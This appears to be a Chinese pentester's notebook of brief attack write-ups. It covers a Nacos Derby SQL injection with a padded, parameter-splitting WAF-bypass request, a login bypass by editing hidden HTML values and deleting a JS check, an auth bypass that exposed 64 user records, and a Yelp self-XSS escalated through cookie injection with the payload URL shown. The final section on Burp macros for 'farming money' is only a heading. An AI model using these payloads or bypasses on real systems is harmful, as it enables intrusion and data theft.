随手记

一、记一次Nacos Sql注入绕过

  1. 正常 poc:http://localhost:8848/nacos/v1/cs/ops/derby?&sql=**SELECT%20*FROM%20users**
  2. 绕过waf:/nacos/v1/cs/ops/derby?sql=**SELECT**--/dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad&sql=/%0a*--/%25&q=dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad%&sql=%0a**from**--/&sql=/%0a**users**

二、记一次攻防实战绕过登录机制进入后台获取大量敏感数据

  1. 网站登录会加载一个特定的 js,通过分析,对几个id的参数进行验证。
  2. 发现返回包是html,看到隐藏的 html 元素。将参数设置为1.
  3. 成功登陆后发现没有数据,然后再通过审查html元素发现了一个 js 文件在返回包中。删除 js 即可绕过。

三、一起全账户接管漏洞案例

  1. admin/country-dashboard 绕过鉴权
  2. 向 API/USERS 发送GET请求(本来是 POST 请求)成功获得64条用户记录

四、如何变废为宝利用self-XSS组合漏洞赚取了6000美金

  1. cookie 中存在 guvo 参数,插入 XSS payload,发包后 payload 会输出在返回包中,未做任何编码转义(显然这只是个 self-xss,后面结合 yelp.com 存在的一个特性进一步提升危害。)

  2. 如果在请求 url 中增加一个参数 ?canary=asdf,响应头中将返回:

    Set-Cookie: yelpmainpaastacanary=**asdf**; Domain=.yelp.com; Path=/; Secure; SameSite=Lax
    
  3. Yelp 后端处理 cookie 时,通过用空格而不是分号来分割 cookie;而浏览器一般是用分号,那么就可以构造 url 如:

    <https://www.yelp.com/?canary=asdf> guvo=</script><script>alert(1)</script>
    

    普通用户访问攻击者构造的 url 后,payload 就存储在该用户 cookie guvo 参数中,每次访问 www.yelp.com 时就会触发 XSS 漏洞。

五、你不曾见过的利用Burp宏刷钱思路